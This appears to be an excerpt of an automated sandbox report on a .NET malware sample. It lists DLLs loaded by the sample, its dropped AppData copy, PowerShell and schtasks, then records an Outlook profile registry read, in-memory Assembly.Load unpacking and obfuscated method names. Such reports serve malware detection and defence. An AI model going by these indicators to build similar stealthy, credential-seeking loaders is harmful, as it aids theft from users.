Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Section loaded: dpapi.dll

Source: C:\Users\user\Desktop\EUYIlr7uUX.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\EUYIlr7uUX.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\EUYIlr7uUX.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: EUYIlr7uUX.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: EUYIlr7uUX.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains potential unpacker

Source: EUYIlr7uUX.exe, appForm.cs	.Net Code: InitializeComponent contains xor as well as GetObject
Source: EUYIlr7uUX.exe, appForm.cs	.Net Code: InitializeComponent
Source: qggKEJlcsFa.exe.0.dr, appForm.cs	.Net Code: InitializeComponent contains xor as well as GetObject
Source: qggKEJlcsFa.exe.0.dr, appForm.cs	.Net Code: InitializeComponent
Source: 0.2.EUYIlr7uUX.exe.3f0ddb0.2.raw.unpack, jMClKYLbW0ZwMAjgIV.cs	.Net Code: k3xhkoeQVg System.Reflection.Assembly.Load(byte[])
Source: 0.2.EUYIlr7uUX.exe.2d088d0.0.raw.unpack, RZ.cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.EUYIlr7uUX.exe.7260000.5.raw.unpack, jMClKYLbW0ZwMAjgIV.cs	.Net Code: k3xhkoeQVg System.Reflection.Assembly.Load(byte[])
Source: 0.2.EUYIlr7uUX.exe.5700000.4.raw.unpack, RZ.cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 8.2.qggKEJlcsFa.exe.2ae8908.0.raw.unpack, RZ.cs	.Net Code: System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 0_2_02C746BB push edx; retf	0_2_02C746BE
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 0_2_02C74659 push edx; retf	0_2_02C7465A
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 0_2_02C747AF push esi; retf	0_2_02C747B2
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 0_2_02C7477B push esi; retf	0_2_02C74782
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 0_2_02C74778 push esi; retf	0_2_02C7477A
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 0_2_06F372C8 pushad ; ret	0_2_06F372C9
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 0_2_06F36050 push 9006F2BBh; ret	0_2_06F36055
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 0_2_08DA3B6F push FFFFFFE8h; retf	0_2_08DA3B71
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 0_2_08DAC287 pushad ; ret	0_2_08DAC28A
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 0_2_08DAA238 pushfd ; ret	0_2_08DAA239
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 0_2_08DAB3E8 pushfd ; iretd	0_2_08DAB3E9
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_00B438F0 push es; ret	7_2_00B43900
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_00E8891E pushad ; iretd	7_2_00E8891F
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_00E88C2F pushfd ; iretd	7_2_00E88C30
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_00E88DDF push esp; iretd	7_2_00E88DE0
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_00E8BDA5 pushfd ; iretd	7_2_00E8BDAA
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_00F818C2 push eax; ret	7_2_00F818C9
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 7_2_00F82580 push eax; iretd	7_2_00F82581
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 8_2_06D4C287 pushad ; ret	8_2_06D4C28A
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 8_2_06D4F8E5 push edi; iretd	8_2_06D4F8E6
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 8_2_085B6050 push 90085ABBh; ret	8_2_085B6055
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 8_2_085B72C8 pushad ; ret	8_2_085B72C9
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_01189C30 push esp; retf 02CEh	12_2_01189D55
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 12_2_0118BDCD pushfd ; iretd	12_2_0118BDD2

Source: EUYIlr7uUX.exe	Static PE information: section name: .text entropy: 7.909567582919158
Source: qggKEJlcsFa.exe.0.dr	Static PE information: section name: .text entropy: 7.909567582919158

Source: 0.2.EUYIlr7uUX.exe.3f0ddb0.2.raw.unpack, YNdikxfkJYADYMcMNZ.cs	High entropy of concatenated method names: 'BlYk9Y0ne', 'yxXCpEUXC', 'fMfKm9vHf', 'gKL4mOXV3', 'Xyh34b5fp', 'eVhaa0G68', 'uil0vexsEjHi1FVL1N', 'LxT7F15XnuIL7G7AZN', 'neZYRGFno', 'sNcJYtAM8'
Source: 0.2.EUYIlr7uUX.exe.3f0ddb0.2.raw.unpack, jTJtxJp6ZCl6QOYVBy.cs	High entropy of concatenated method names: 'lkkbQuYjIU', 'bpvbsrG8jN', 'KZAbfGjQFm', 'p79bc83Mxm', 'QiLbF7V8sA', 'CpHbH7avHC', 'CELDkZoL5M795QP6jX', 'JCnRWSBlMqKNJ7Xgn3', 'Uh4bbBBhKB', 'G7ib1fJx4K'
Source: 0.2.EUYIlr7uUX.exe.3f0ddb0.2.raw.unpack, qMVrYyUxpm7ZR6oNUG.cs	High entropy of concatenated method names: 'g9UYMX4q5i', 'vFPYjDZexs', 'JD9Yud3SYv', 'GLUYg3cSLp', 'I1cYIu4aDF', 'RjtYQpQliC', 'jioYscukxq', 'Gx8Yrv2f2g', 'KOtYfL743X', 'OxxYcGwdhN'
Source: 0.2.EUYIlr7uUX.exe.3f0ddb0.2.raw.unpack, p0fV6frxjob8mcjEqW9.cs	High entropy of concatenated method names: 'm53BVdfRW5', 'BngBSofHDi', 'tugBkeGuLu', 'H64BCIQWdu', 'wFyB77jSLj', 'bdKBKIROQp', 'KenB4I7axd', 'G2bBPFEv2Y', 'XWNB32g1mi', 'yO2Basn5gr'
Source: 0.2.EUYIlr7uUX.exe.3f0ddb0.2.raw.unpack, uqvTtGIvaBHE6UeMGK.cs	High entropy of concatenated method names: 'x240yvkwgf', 't2w0NiHm9o', 'gGLYivuXb3', 'hlZYbyaxfe', 'sc50xtVtqb', 'Wtf0T6la5a', 'ETh0DUkny9', 'ygq0tGS33p', 'n8S0ZrWofE', 'Nfq02CXI2j'
Source: 0.2.EUYIlr7uUX.exe.3f0ddb0.2.raw.unpack, zDpuySnEP5tQ1Ge5g9.cs	High entropy of concatenated method names: 'GRrYOMO4tJ', 'NpyYdJyWJw', 'lCHYpEZAoq', 'yjSYLhknL9', 'qVbYt1J2DM', 'WCmYqRivN4', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.EUYIlr7uUX.exe.3f0ddb0.2.raw.unpack, IDSxNlPIe1AtwndLFr.cs	High entropy of concatenated method names: 'lPyuCJbCQ7', 'FVDuKw4YK8', 'rsPuP4uWKN', 'iUMu3O5XSQ', 'tf3uFtMTbu', 'IEZuHbwJHS', 'iHou0KmTni', 'AxAuYHH5OC', 'nB0uB4uu0Y', 'LOQuJg6pfF'
Source: 0.2.EUYIlr7uUX.exe.3f0ddb0.2.raw.unpack, J4AsxZeGWdFi7E2jqj.cs	High entropy of concatenated method names: 'W3eIGZDDsH', 'M4uIjWv2vO', 'PgMIgBFpTU', 'pmiIQfdmYL', 'J3cIsRaFdy', 'wrpgonfAwo', 'z2IgUUNdQ4', 'qJHgvtMWj2', 'jSogy6jgAa', 'CTYgWKtuAb'
Source: 0.2.EUYIlr7uUX.exe.3f0ddb0.2.raw.unpack, s5tH6CgMQIoDxk6cC6.cs	High entropy of concatenated method names: 'wfTjtdmNxq', 'rjcjZLnOg2', 'DRtj2YYpO8', 'bEDj5RJUOb', 'gFFjoVnphM', 'Ru9jU35R2p', 'SC2jvjoqx6', 'hppjyVpteF', 'Hs6jWMWfLc', 'rWejNb0vOw'
Source: 0.2.EUYIlr7uUX.exe.3f0ddb0.2.raw.unpack, YAPLLtBb6NkWFSMtDy.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'esZwWYbvLw', 'Fc0wNx6iq3', 'rYOwzmCsfV', 'GtF1iiK5C5', 'tAN1bDUoY4', 'thP1w19xEA', 'UDo11cX0RI', 'IOWroPN9Y54npdvXYvj'
Source: 0.2.EUYIlr7uUX.exe.3f0ddb0.2.raw.unpack, jNaYVizBweP65Gvgff.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'tMKBm5bCva', 'WcHBFxIrlH', 'xSKBH3xkBF', 'rTvB0ZKoX9', 'bkTBYPjjJE', 'cgwBByQE15', 'h3FBJLXsgG'
Source: 0.2.EUYIlr7uUX.exe.3f0ddb0.2.raw.unpack, jadlAxsynqkCnj8WVa.cs	High entropy of concatenated method names: 'VyLg7L063t', 'YX1g4jIDSW', 'lsQupxtcdC', 'PrfuLPgcmT', 'fZAuqaSg8B', 'NPau6XB6ua', 'XnculMSXmc', 'YewuXOxiC5', 'aNBu8201QJ', 'MP2unjm1eb'
Source: 0.2.EUYIlr7uUX.exe.3f0ddb0.2.raw.unpack, upTSKLy99yoEtfjfp1.cs	High entropy of concatenated method names: 'Dispose', 'saDbWZ3V0Y', 'OI4wdH4RSn', 'GOqee6Gcna', 'TeKbNcE3qT', 'cvwbzSuOUC', 'ProcessDialogKey', 'bqKwinPEmY', 'v9OwbgR2xD', 'AMpwwAySch'
Source: 0.2.EUYIlr7uUX.exe.3f0ddb0.2.raw.unpack, Rhy2Eh1eq08DxtC0GN.cs	High entropy of concatenated method names: 'ToString', 'SDIHxYlCoE', 'gpCHdpsfqj', 'vOBHp08yO3', 'SEfHLg3UsS', 'rBWHqQXHII', 'wxtH6gxreK', 'OAPHlRjfQ0', 'KtxHXVwSaU', 'IOiH8x8Irt'
Source: 0.2.EUYIlr7uUX.exe.3f0ddb0.2.raw.unpack, VUss1svOlRWUsddMXY.cs	High entropy of concatenated method names: 'MRDBb37295', 'AF7B1rilv0', 'NI8BhHTHma', 'YGlBMDX0n0', 'oqKBjtfPkW', 'eyTBgHmQKR', 'mCpBI21uDM', 'wSUYv74DeM', 'p1fYyO74wr', 'd1eYW34Lth'
Source: 0.2.EUYIlr7uUX.exe.3f0ddb0.2.raw.unpack, iS7yTTix2f7oFOT1q9.cs	High entropy of concatenated method names: 'NkBmPGlWsM', 'jSrm3aQAxT', 'alGmOQ3Cd9', 'GJxmdlBd64', 'vlOmL7oNu8', 'qpumqcJCpK', 'Bcoml7l1QF', 'BytmX8QmFc', 'bdOmntAw0D', 'PwGmxxBhoY'
Source: 0.2.EUYIlr7uUX.exe.3f0ddb0.2.raw.unpack, gC7Wkb36mD47bHS2vL.cs	High entropy of concatenated method names: 'cHJQVxgNX6', 'cGdQSa7VM1', 'YfaQkxwSyL', 'm8tQCwM1uH', 'PBXQ7Z7Jwy', 'TtvQKxLoF6', 'TtUQ4hBKM8', 'EmJQPsgFgT', 'Ru5Q360s2G', 'gPNQaVyP5a'
Source: 0.2.EUYIlr7uUX.exe.3f0ddb0.2.raw.unpack, bB6KGCc7idQBx93ujG.cs	High entropy of concatenated method names: 'oZJI2MLl8C', 't74I5UB5b8', 'AndIo3kblI', 'ToString', 'qUVIUS2BeA', 'chpIvokDu5', 'UVJMnCZk2ZVC2qOsDQf', 'PQawx0Zrd26EgmgASNc', 'AYQh8oZqkVqXNm3OgiW', 'DAFxp3Z10wvk0lxaYul'
Source: 0.2.EUYIlr7uUX.exe.3f0ddb0.2.raw.unpack, j1wlcXrOU9GBxr9O0kU.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'frOJtxYYjA', 'DfNJZNPh5j', 'UDkJ2jtFrS', 'RMHJ5Pqg85', 'JWSJo20V7J', 'yfLJUwVnYl', 'qC8Jv3YCCX'
Source: 0.2.EUYIlr7uUX.exe.3f0ddb0.2.raw.unpack, jMClKYLbW0ZwMAjgIV.cs	High entropy of concatenated method names: 'UZa1GcB81e', 'zeF1MaqViA', 'CiM1jDxvZq', 'M9U1uYZoa3', 'ueL1gjZFoF', 'Mq81Iaro8K', 'Mh91QkDuZT', 'MoW1sOe0rc', 'OEF1rqm4lZ', 'bvm1ffuIaD'
Source: 0.2.EUYIlr7uUX.exe.7260000.5.raw.unpack, YNdikxfkJYADYMcMNZ.cs	High entropy of concatenated method names: 'BlYk9Y0ne', 'yxXCpEUXC', 'fMfKm9vHf', 'gKL4mOXV3', 'Xyh34b5fp', 'eVhaa0G68', 'uil0vexsEjHi1FVL1N', 'LxT7F15XnuIL7G7AZN', 'neZYRGFno', 'sNcJYtAM8'
Source: 0.2.EUYIlr7uUX.exe.7260000.5.raw.unpack, jTJtxJp6ZCl6QOYVBy.cs	High entropy of concatenated method names: 'lkkbQuYjIU', 'bpvbsrG8jN', 'KZAbfGjQFm', 'p79bc83Mxm', 'QiLbF7V8sA', 'CpHbH7avHC', 'CELDkZoL5M795QP6jX', 'JCnRWSBlMqKNJ7Xgn3', 'Uh4bbBBhKB', 'G7ib1fJx4K'
Source: 0.2.EUYIlr7uUX.exe.7260000.5.raw.unpack, qMVrYyUxpm7ZR6oNUG.cs	High entropy of concatenated method names: 'g9UYMX4q5i', 'vFPYjDZexs', 'JD9Yud3SYv', 'GLUYg3cSLp', 'I1cYIu4aDF', 'RjtYQpQliC', 'jioYscukxq', 'Gx8Yrv2f2g', 'KOtYfL743X', 'OxxYcGwdhN'
Source: 0.2.EUYIlr7uUX.exe.7260000.5.raw.unpack, p0fV6frxjob8mcjEqW9.cs	High entropy of concatenated method names: 'm53BVdfRW5', 'BngBSofHDi', 'tugBkeGuLu', 'H64BCIQWdu', 'wFyB77jSLj', 'bdKBKIROQp', 'KenB4I7axd', 'G2bBPFEv2Y', 'XWNB32g1mi', 'yO2Basn5gr'
